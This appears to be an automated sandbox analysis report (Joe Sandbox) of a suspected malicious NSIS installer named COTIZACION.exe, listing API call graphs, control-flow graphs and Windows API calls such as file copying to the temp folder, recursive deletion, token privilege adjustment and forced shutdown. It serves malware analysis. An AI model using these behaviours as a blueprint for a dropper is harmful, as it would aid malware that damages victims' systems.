API calls 3055->3056 3056->3049 3056->3052 3056->3054 3056->3055 3058 403b9e CloseHandle 3056->3058 3157 4066b4 CreateProcessW 3056->3157 3058->3056 3059->2986 3060->2988 3062 406d1b 5 API calls 3061->3062 3064 403c8f 3062->3064 3063 403c99 3063->2993 3064->3063 3065 406534 3 API calls 3064->3065 3066 403ca1 3065->3066 3067 405dfc 2 API calls 3066->3067 3068 403ca7 3067->3068 3069 406a34 2 API calls 3068->3069 3070 403cb2 3069->3070 3070->2993 3185 4068f9 GetFileAttributesW CreateFileW 3071->3185 3073 40340d 3074 40341a 3073->3074 3186 406af8 lstrcpynW 3073->3186 3074->3001 3076 403430 3187 406cee lstrlenW 3076->3187 3080 403441 GetFileSize 3081 40345a 3080->3081 3095 403548 3080->3095 3081->3074 3083 40311b ReadFile 3081->3083 3084 403616 3081->3084 3094 403367 6 API calls 3081->3094 3081->3095 3083->3081 3089 403367 6 API calls 3084->3089 3085 403598 GlobalAlloc 3204 403131 SetFilePointer 3085->3204 3086 403557 3086->3074 3086->3085 3203 403131 SetFilePointer 3086->3203 3089->3074 3090 4035b5 3092 403148 31 API calls 3090->3092 3091 403574 3093 406926 ReadFile 3091->3093 3097 4035c4 3092->3097 3096 403586 3093->3096 3094->3081 3192 403367 3095->3192 3096->3074 3096->3085 3097->3074 3097->3097 3098 4035f4 SetFilePointer 3097->3098 3098->3074 3100 4068c4 5 API calls 3099->3100 3101 405a30 3100->3101 3102 405a39 3101->3102 3103 405a4b 3101->3103 3217 4065fd wsprintfW 3102->3217 3104 406955 3 API calls 3103->3104 3105 405a7a 3104->3105 3107 405a99 lstrcatW 3105->3107 3109 406955 3 API calls 3105->3109 3108 405a49 3107->3108 3209 40595d 3108->3209 3109->3107 3112 406616 18 API calls 3113 405acb 3112->3113 3114 405b65 3113->3114 3116 406955 3 API calls 3113->3116 3115 406616 18 API calls 3114->3115 3117 405b6b 3115->3117 3118 405afe 3116->3118 3119 405b7b LoadImageW 3117->3119 3120 405e98 17 API calls 3117->3120 3118->3114 3123 405b22 lstrlenW 3118->3123 3128 4065d4 CharNextW 3118->3128 3121 405c28 3119->3121 3122 405bab RegisterClassW 3119->3122 3120->3119 3126 401533 90 API calls 3121->3126 3124 405bd8 3122->3124 3125 405bdf SystemParametersInfoW CreateWindowExW 3122->3125 3129 405b32 lstrcmpiW 3123->3129 3130 405b58 3123->3130 3124->3011 3125->3121 3127 405c2e 3126->3127 3127->3124 3134 40595d 18 API calls 3127->3134 3132 405b1d 3128->3132 3129->3130 3133 405b42 GetFileAttributesW 3129->3133 3131 406534 3 API calls 3130->3131 3135 405b5e 3131->3135 3132->3123 3136 405b4e 3133->3136 3138 405c3b 3134->3138 3218 406af8 lstrcpynW 3135->3218 3136->3130 3137 406cee 2 API calls 3136->3137 3137->3130 3140 405c47 ShowWindow 3138->3140 3141 405cc9 3138->3141 3143 40617c 3 API calls 3140->3143 3219 405842 OleInitialize 3141->3219 3145 405c5f 3143->3145 3144 405ccf 3146 405cd3 3144->3146 3147 405ced 3144->3147 3148 405c6d GetClassInfoW 3145->3148 3149 40617c 3 API calls 3145->3149 3146->3124 3153 401533 90 API calls 3146->3153 3150 401533 90 API calls 3147->3150 3151 405c80 GetClassInfoW RegisterClassW 3148->3151 3152 405c96 DialogBoxParamW 3148->3152 3149->3148 3154 405cf4 3150->3154 3151->3152 3155 401533 90 API calls 3152->3155 3153->3124 3154->3154 3155->3124 3156->3056 3158 4066f3 3157->3158 3159 4066e7 CloseHandle 3157->3159 3158->3056 3159->3158 3160->2991 3227 406af8 lstrcpynW 3161->3227 3163 406627 3164 406ba3 4 API calls 3163->3164 3165 40662d 3164->3165 3166 406d1b 5 API calls 3165->3166 3173 403a64 3165->3173 3171 406639 3166->3171 3167 406669 lstrlenW 3168 406675 3167->3168 3167->3171 3170 406534 3 API calls 3168->3170 3169 4065ad 2 API calls 3169->3171 3172 40667a GetFileAttributesW 3170->3172 3171->3167 3171->3169 3171->3173 3174 406cee 2 API calls 3171->3174 3172->3173 3173->3011 3175 406af8 lstrcpynW 3173->3175 3174->3167 3175->3038 3176->3044 3177->3046 3179 4036c8 3178->3179 3180 4036ba CloseHandle 3178->3180 3228 403cf1 3179->3228 3180->3179 3185->3073 3186->3076 3188 406cfd 3187->3188 3189 406d03 CharPrevW 3188->3189 3190 403436 3188->3190 3189->3188 3189->3190 3191 406af8 lstrcpynW 3190->3191 3191->3080 3193 403386 3192->3193 3194 40336e 3192->3194 3197 403397 GetTickCount 3193->3197 3198 40338f 3193->3198 3195 403377 DestroyWindow 3194->3195 3196 40337e 3194->3196 3195->3196 3196->3086 3200 4033a5 CreateDialogParamW ShowWindow 3197->3200 3201 4033ca 3197->3201 3205 4061ed 3198->3205 3200->3201 3201->3086 3203->3091 3204->3090 3206 4061ff PeekMessageW 3205->3206 3207 4061f5 DispatchMessageW 3206->3207 3208 403396 3206->3208 3207->3206 3208->3086 3210 405970 3209->3210 3226 4065fd wsprintfW 3210->3226 3212 4059e9 3213 405cf9 18 API calls 3212->3213 3215 4059ee 3213->3215 3214 405a17 3214->3112 3215->3214 3216 405e98 17 API calls 3215->3216 3216->3215 3217->3108 3218->3114 3220 4054c6 SendMessageW 3219->3220 3223 405865 3220->3223 3221 40588c 3222 4054c6 SendMessageW 3221->3222 3224 40589e OleUninitialize 3222->3224 3223->3221 3225 401399 90 API calls 3223->3225 3224->3144 3225->3223 3226->3212 3227->3163 3229 403cff 3228->3229 3230 403d04 FreeLibrary GlobalFree 3229->3230 3231 4036cd 3229->3231 3230->3230 3230->3231 3232 4066f7 3231->3232 3233 406616 18 API calls 3232->3233 3234 406719 3233->3234 3235 406722 DeleteFileW 3234->3235 3236 406739 3234->3236 3237 4036d9 OleUninitialize 3235->3237 3236->3237 3250 406859 3236->3250 3271 406af8 lstrcpynW 3236->3271 3237->3012 3237->3013 3239 406761 3240 406779 3239->3240 3241 40676b lstrcatW 3239->3241 3244 406cee 2 API calls 3240->3244 3243 40677f 3241->3243 3242 4065ad 2 API calls 3245 406876 3242->3245 3246 406790 lstrcatW 3243->3246 3249 406798 lstrlenW FindFirstFileW 3243->3249 3244->3243 3245->3237 3247 40687a 3245->3247 3246->3249 3248 406534 3 API calls 3247->3248 3251 406880 3248->3251 3249->3250 3258 4067c1 3249->3258 3250->3237 3250->3242 3252 406563 5 API calls 3251->3252 3253 40688c 3252->3253 3255 406890 3253->3255 3256 4068af 3253->3256 3254 40683b FindNextFileW 3254->3258 3259 406852 FindClose 3254->3259 3255->3237 3261 405d18 24 API calls 3255->3261 3260 405d18 24 API calls 3256->3260 3258->3254 3265 4066f7 59 API calls 3258->3265 3267 406807 3258->3267 3272 406af8 lstrcpynW 3258->3272 3259->3250 3260->3237 3262 40689c 3261->3262 3264 40621b 35 API calls 3262->3264 3266 4068a5 3264->3266 3265->3267 3266->3237 3267->3254 3268 405d18 24 API calls 3267->3268 3269 405d18 24 API calls 3267->3269 3270 40621b 35 API calls 3267->3270 3273 406563 3267->3273 3268->3254 3269->3267 3270->3267 3271->3239 3272->3258 3274 406b7b 2 API calls 3273->3274 3275 40656f 3274->3275 3276 406591 3275->3276 3277 406587 DeleteFileW 3275->3277 3278 40657f RemoveDirectoryW 3275->3278 3276->3267 3279 40658d 3277->3279 3278->3279 3279->3276 3280 40659c SetFileAttributesW 3279->3280 3280->3276 3372 70022ebf 3373 70022ed7 3372->3373 3374 70021309 2 API calls 3373->3374 3375 70022ef2 3374->3375

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 4036da-403723 SetErrorMode GetVersionExW 1 403725-403745 GetVersionExW 0->1 2 40375c 0->2 3 403747-40374b 1->3 4 403758-40375a 1->4 5 403763-403768 2->5 6 40374e-403756 3->6 4->6 7 403775 5->7 8 40376a-403773 5->8 6->5 9 403779-4037bb 7->9 8->9 10 4037bd-4037c5 call 4068c4 9->10 11 4037ce 9->11 10->11 16 4037c7 10->16 13 4037d3-4037e5 call 40617c lstrlenA 11->13 18 4037e7-403803 call 4068c4 * 3 13->18 16->11 25 403814-4038ad #17 OleInitialize SHGetFileInfoW call 406af8 GetCommandLineW call 406af8 call 4065d4 CharNextW 18->25 26 403805-40380b 18->26 35 4038b3 25->35 36 403988-4039a2 GetTempPathW call 403c83 25->36 26->25 30 40380d 26->30 30->25 38 4038b5-4038bb 35->38 42 4039a4-4039c2 GetWindowsDirectoryW lstrcatW call 403c83 36->42 43 4039fa-403a13 DeleteFileW call 4033cb 36->43 40 4038c8-4038d3 38->40 41 4038bd-4038c6 38->41 44 4038d5-4038dc 40->44 45 4038de-4038ed 40->45 41->40 41->41 42->43 59 4039c4-4039f4 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403c83 42->59 61 403bc4 43->61 62 403a19-403a1f 43->62 44->45 46 403948-40395c call 4065d4 45->46 47 4038ef-4038fb 45->47 69 403964-40396a 46->69 70 40395e-403961 46->70 50 403915-40391b 47->50 51 4038fd-403904 47->51 57 403937-40393e 50->57 58 40391d-403924 50->58 55 403906-403909 51->55 56 40390b 51->56 55->50 55->56 56->50 57->46 67 403940-403946 57->67 58->57 65 403926-40392d 58->65 59->43 83 403bc2 59->83 66 403bc8-403bd5 call 4036b0 OleUninitialize 61->66 63 403a21-403a33 call 4065d4 62->63 64 403a84-403a8b call 405a1c 62->64 84 403a49-403a4b 63->84 80 403a90-403a92 64->80 74 403934 65->74 75 40392f-403932 65->75 85 403bd7-403be2 call 406a86 66->85 86 403bea-403bf1 66->86 67->46 77 403974-403983 call 406af8 67->77 69->36 71 40396c-40396f 69->71 70->69 71->38 74->57 75->57 75->74 77->36 80->66 83->61 87 403a35-403a3b 84->87 88 403a4d-403a54 84->88 96 403be4 ExitProcess 85->96 90 403bf3-403c09 GetCurrentProcess OpenProcessToken 86->90 91 403c6f-403c7e 86->91 92 403a46 87->92 93 403a3d-403a44 87->93 94 403a56-403a66 call 406616 88->94 95 403a97-403aaf call 4064da lstrcatW 88->95 98 403c0b-403c39 LookupPrivilegeValueW AdjustTokenPrivileges 90->98 99 403c3f-403c4d call 4068c4 90->99 91->96 92->84 93->88 93->92 110 403a6c-403a82 call 406af8 * 2 94->110 111 403bbe-403bc0 94->111 108 403ac0-403ae1 lstrcatW lstrcmpiW 95->108 109 403ab1-403abb lstrcatW 95->109 98->99 106 403c5b-403c66 ExitWindowsEx 99->106 107 403c4f-403c59 99->107 106->91 112 403c68-403c6a call 401533 106->112 107->106 107->112 108->111 113 403ae7-403aee 108->113 109->108 110->64 111->66 112->91 117 403af0-403af5 call 405e1c 113->117 118 403af7 call 405dfc 113->118 124 403afc-403b0e SetCurrentDirectoryW 117->124 118->124 126 403b10-403b1a call 406af8 124->126 127 403b1f-403b39 call 406af8 124->127 126->127 131 403b3a-403b58 call 405e98 DeleteFileW 127->131 134 403ba7-403bb1 131->134 135 403b5a-403b6e CopyFileW 131->135 134->131 136 403bb3-403bb9 call 40621b 134->136 135->134 137 403b70-403b95 call 40621b call 405e98 call 4066b4 135->137 136->111 144 403b9a-403b9c 137->144 144->134 145 403b9e-403ba5 CloseHandle 144->145 145->134
                                                                                                APIs
                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 004036F6
                                                                                                • GetVersionExW.KERNEL32(?), ref: 0040371F
                                                                                                • GetVersionExW.KERNEL32(?), ref: 00403732
                                                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004037DA
                                                                                                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403814
                                                                                                • OleInitialize.OLE32(00000000), ref: 0040381B
                                                                                                • SHGetFileInfoW.SHELL32(004085B0,00000000,?,000002B4,00000000), ref: 0040383A
                                                                                                • GetCommandLineW.KERNEL32(007A7540,NSIS Error), ref: 0040384F
                                                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\COTIZACION.exe",?,"C:\Users\user\Desktop\COTIZACION.exe",00000000), ref: 0040389B
                                                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403999
                                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004039AA
                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039B6
                                                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039CA
                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004039D2
                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004039E3
                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004039EB
                                                                                                • DeleteFileW.KERNELBASE(1033), ref: 00403A05
                                                                                                  • Part of subcall function 004033CB: GetTickCount.KERNEL32 ref: 004033DE
                                                                                                  • Part of subcall function 004033CB: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\COTIZACION.exe,00000400), ref: 004033FA
                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\COTIZACION.exe",00000000,00000000), ref: 00403AA8
                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00408600,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\COTIZACION.exe",00000000,00000000), ref: 00403ABB
                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\COTIZACION.exe",00000000,00000000), ref: 00403ACA
                                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\COTIZACION.exe",00000000,00000000), ref: 00403AD9
                                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B01
                                                                                                • DeleteFileW.KERNEL32(0079F200,0079F200,?,007A9000,?), ref: 00403B54
                                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\COTIZACION.exe,0079F200,00000001), ref: 00403B66
                                                                                                • CloseHandle.KERNEL32(00000000,0079F200,0079F200,?,0079F200,00000000), ref: 00403B9F
                                                                                                  • Part of subcall function 00405DFC: CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00405E04
                                                                                                  • Part of subcall function 00405DFC: GetLastError.KERNEL32 ref: 00405E0E
                                                                                                • OleUninitialize.OLE32(00000000), ref: 00403BCD
                                                                                                • ExitProcess.KERNEL32 ref: 00403BE4
                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BFA
                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403C01
                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C16
                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403C39
                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C5E
                                                                                                  • Part of subcall function 004065D4: CharNextW.USER32(?,0040389A,"C:\Users\user\Desktop\COTIZACION.exe",?,"C:\Users\user\Desktop\COTIZACION.exe",00000000), ref: 004065EA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: Filelstrcat$DirectoryProcess$CharCurrentDeleteEnvironmentErrorExitNextPathTempTokenVariableVersionWindows$AdjustCloseCommandCopyCountCreateHandleInfoInitializeLastLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcmpilstrlen
                                                                                                • String ID: "C:\Users\user\Desktop\COTIZACION.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\COTIZACION.exe$C:\Users\user\overlays\besvangredes$C:\Users\user\overlays\besvangredes\Afbetaltes$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                • API String ID: 1152188737-1432178247
                                                                                                • Opcode ID: 12ebdcd378dca8b2cb256432fecdbae80df5df33235eb46f5e0670d6daf7f44b
                                                                                                • Instruction ID: ef6c2823884109cd5a884fcd16d1840cc0f2fcd0ed87f9f7bcd5e2f232321f3d
                                                                                                • Opcode Fuzzy Hash: 12ebdcd378dca8b2cb256432fecdbae80df5df33235eb46f5e0670d6daf7f44b
                                                                                                • Instruction Fuzzy Hash: B8D14DB16043106AD7207FB19D45B6B3EECAB4574AF05443FF585B62D2DBBC8A40872E
                                                                                                APIs
                                                                                                  • Part of subcall function 700212F8: GlobalAlloc.KERNELBASE(00000040,?,700211C4,-000000A0), ref: 70021302
                                                                                                • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 7002294E
                                                                                                • lstrcpyW.KERNEL32(00000008,?), ref: 700229A4
                                                                                                • lstrcpyW.KERNEL32(00000808,?), ref: 700229AF
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 700229C0
                                                                                                • GlobalFree.KERNEL32(?), ref: 70022A44
                                                                                                • GlobalFree.KERNEL32(?), ref: 70022A4A
                                                                                                • GlobalFree.KERNEL32(?), ref: 70022A50
                                                                                                • GetModuleHandleW.KERNEL32(00000008), ref: 70022B1A
                                                                                                • LoadLibraryW.KERNEL32(00000008), ref: 70022B2B
                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 70022B82
                                                                                                • lstrlenW.KERNEL32(00000808), ref: 70022B9D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2037043601.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2036962421.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2037063212.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2037081100.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_70020000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$Free$Alloclstrcpy$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 1042148487-0
                                                                                                • Opcode ID: 01a9cc7be63b2bf7b2f5ee67372f57986f880b10be9e15ed611c1b68974d87a2
                                                                                                • Instruction ID: 2ba2e0282eae7e96d4a0a026fa72561c786d71a78ca349f4d4e9e090fa7addca
                                                                                                • Opcode Fuzzy Hash: 01a9cc7be63b2bf7b2f5ee67372f57986f880b10be9e15ed611c1b68974d87a2
                                                                                                • Instruction Fuzzy Hash: 5C42D471A08302AFD315CF74E44475EB7F6FF88B22F504A2EE49AD6254D770D9848B92

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 866 4066f7-406720 call 406616 869 406722-406734 DeleteFileW 866->869 870 406739-406743 866->870 871 4068b8-4068c1 869->871 872 406745-406747 870->872 873 406756-406769 call 406af8 870->873 874 4068a7-4068ad 872->874 875 40674d-406750 872->875 880 406779-40677a call 406cee 873->880 881 40676b-406777 lstrcatW 873->881 879 4068b7 874->879 875->873 877 406870-406878 call 4065ad 875->877 877->879 888 40687a-40688e call 406534 call 406563 877->888 879->871 883 40677f-406784 880->883 881->883 886 406790-406796 lstrcatW 883->886 887 406786-40678e 883->887 890 406798-4067bb lstrlenW FindFirstFileW 886->890 887->886 887->890 902 406890-406892 888->902 903 4068af-4068b2 call 405d18 888->903 891 4067c1-4067c3 890->891 892 406859-40685e 890->892 894 4067c4-4067c9 891->894 892->879 896 406860-40686e 892->896 897 4067e2-4067f5 call 406af8 894->897 898 4067cb-4067d1 894->898 896->874 896->877 911 4067f7-4067fe 897->911 912 406809-406812 call 406563 897->912 900 4067d3-4067d8 898->900 901 40683b-40684c FindNextFileW 898->901 900->897 905 4067da-4067e0 900->905 901->894 908 406852-406853 FindClose 901->908 902->874 906 406894-4068a5 call 405d18 call 40621b 902->906 903->879 905->897 905->901 906->879 908->892 911->901 914 406800-406802 call 4066f7 911->914 921 406833-406836 call 405d18 912->921 922 406814-406816 912->922 920 406807 914->920 920->901 921->901 923 406818-406829 call 405d18 call 40621b 922->923 924 40682b-406831 922->924 923->901 924->901
                                                                                                APIs
                                                                                                  • Part of subcall function 00406616: lstrlenW.KERNEL32(007A4288,00000000,007A4288,007A4288,?,?,?,00406719,?,00000000,76F93420,?), ref: 0040666A
                                                                                                  • Part of subcall function 00406616: GetFileAttributesW.KERNELBASE(007A4288,007A4288), ref: 0040667B
                                                                                                • DeleteFileW.KERNELBASE(?,?,00000000,76F93420,?), ref: 00406723
                                                                                                • lstrcatW.KERNEL32(007A3A88,\*.*,007A3A88,?,00000000,?,00000000,76F93420,?), ref: 00406775
                                                                                                • lstrcatW.KERNEL32(?,004082B0,?,007A3A88,?,00000000,?,00000000,76F93420,?), ref: 00406796
                                                                                                • lstrlenW.KERNEL32(?), ref: 00406799
                                                                                                • FindFirstFileW.KERNEL32(007A3A88,?), ref: 004067B0
                                                                                                • FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00406841
                                                                                                • FindClose.KERNEL32(00000000), ref: 00406853
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
                                                                                                • String ID: \*.*
                                                                                                • API String ID: 2636146433-1173974218
                                                                                                • Opcode ID: e2e738021974a1aad663f4d73af15b9e2c0d72d7b607af8b3925b065a255c774
                                                                                                • Instruction ID: 325cce783f2df783a7673d4e22b29853c472d97363b16a381ac5d63d2c539c61
                                                                                                • Opcode Fuzzy Hash: e2e738021974a1aad663f4d73af15b9e2c0d72d7b607af8b3925b065a255c774
                                                                                                • Instruction Fuzzy Hash: 2741373210631069D720BB658D05A6B72ACDF92318F16853FF893B21D1EB3C8965C6AF
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNELBASE(?,007A5E88,00000000,0040665A,007A4288), ref: 004065B8
                                                                                                • FindClose.KERNEL32(00000000), ref: 004065C4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFileFirst
                                                                                                • String ID:
                                                                                                • API String ID: 2295610775-0
                                                                                                • Opcode ID: a2d354ff7ed2319fbee56d8d140705e4a76cab61c7ff8bd1d53ab4a71d5363ca
                                                                                                • Instruction ID: 54e165a9d952ab4a9c526d77f24574b80d9b4166436818e4e9d84c3548612847
                                                                                                • Opcode Fuzzy Hash: a2d354ff7ed2319fbee56d8d140705e4a76cab61c7ff8bd1d53ab4a71d5363ca
                                                                                                • Instruction Fuzzy Hash: A5D012315191607FC2501B387F0C84B7A599F65372B114B36B4A6F51E4DA348C628698

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
